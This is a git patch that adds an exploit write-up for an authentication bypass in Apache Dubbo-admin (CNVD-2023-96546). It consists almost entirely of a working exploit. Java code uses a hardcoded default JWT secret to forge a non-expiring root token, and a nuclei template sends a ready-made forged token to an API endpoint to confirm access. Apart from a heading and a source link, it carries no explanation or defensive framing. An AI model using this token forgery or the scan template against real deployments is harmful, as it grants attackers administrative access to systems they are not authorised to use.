From 9b6955784916defa469bd1edc12d3f502fd97726 Mon Sep 17 00:00:00 2001
From: wy876 <139549762+wy876@users.noreply.github.com>
Date: Wed, 17 Jan 2024 19:17:40 +0800
Subject: [PATCH] Create Apache Dubbo-admin-authorized-bypass
 (CNVD-2023-96546).md

---
 ...min-authorized-bypass (CNVD-2023-96546).md | 71 +++++++++++++++++++
 1 file changed, 71 insertions(+)
 create mode 100644 Apache Dubbo-admin-authorized-bypass (CNVD-2023-96546).md

diff --git a/Apache Dubbo-admin-authorized-bypass (CNVD-2023-96546).md b/Apache Dubbo-admin-authorized-bypass (CNVD-2023-96546).md
new file mode 100644
index 0000000..3dfa011
--- /dev/null
+++ b/Apache Dubbo-admin-authorized-bypass (CNVD-2023-96546).md	
@@ -0,0 +1,71 @@
+## Apache Dubbo-admin-authorized-bypass (CNVD-2023-96546)
+
+
+## exp
+```java
+package org.apache.dubbo.admin.controller;
+
+import io.jsonwebtoken.Jwts;
+import io.jsonwebtoken.SignatureAlgorithm;
+
+import java.util.Date;
+import java.util.HashMap;
+import java.util.Map;
+
+public class jwt {
+    public static String generateToken(String rootUserName) {
+        String secret = "86295dd0c4ef69a1036b0b0c15158d77";
+        Long timeStamp = 9999999999999L;
+        Date date = new Date(timeStamp);
+        final SignatureAlgorithm defaultAlgorithm = SignatureAlgorithm.HS512;
+        Map<String, Object> claims = new HashMap<>(1);
+        claims.put("sub", rootUserName);
+        return Jwts.builder()
+                .setClaims(claims)
+                .setExpiration(date)
+                .setIssuedAt(new Date(System.currentTimeMillis()))
+                .signWith(defaultAlgorithm, secret)
+                .compact();
+    }
+    public static void main(String[] args) {
+        String root = jwt.generateToken("root");
+        System.out.println(root);
+
+
+    }
+}
+```
+
+## nuclei
+```
+id: dubbo-admin_Unauthorized_bypass
+info:
+  name: Template Name
+  author: 
+  severity: medium
+  description: dubbo-admin Unauthorized access bypass
+  reference:
+    - https://
+  tags: apache,dubbo-admin
+requests:
+  - raw:
+      - |+
+        GET /api/dev/consumers HTTP/1.1
+        Host: {{Hostname}}
+        Accept: application/json, text/plain, */*
+        Authorization: eyJhbGciOiJIUzUxMiJ9.eyJleHAiOjk5OTk5OTk5OTksInN1YiI6InJvb3QiLCJpYXQiOjE2OTkwODM2Mzd9.wKRqJkWxr_nVDcVVF5rniqhnACtqaDnYUUu55g-atkIwRIt1A-SMpKqBN5zrGZl4kFVcrjzMvXsYqfqf0N9Gbg
+        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.5112.102 Safari/537.36
+        Referer: http://{{Hostname}}/
+        Accept-Encoding: gzip, deflate
+        Accept-Language: zh-CN,zh;q=0.9
+        Connection: close
+
+    matchers:
+      - type: word
+        part: header
+        words:
+          - 'HTTP/1.1 200 '
+```
+
+## 漏洞来源
+- https://mp.weixin.qq.com/s/Wsdx_qi1PeiDwbF_YadoOQ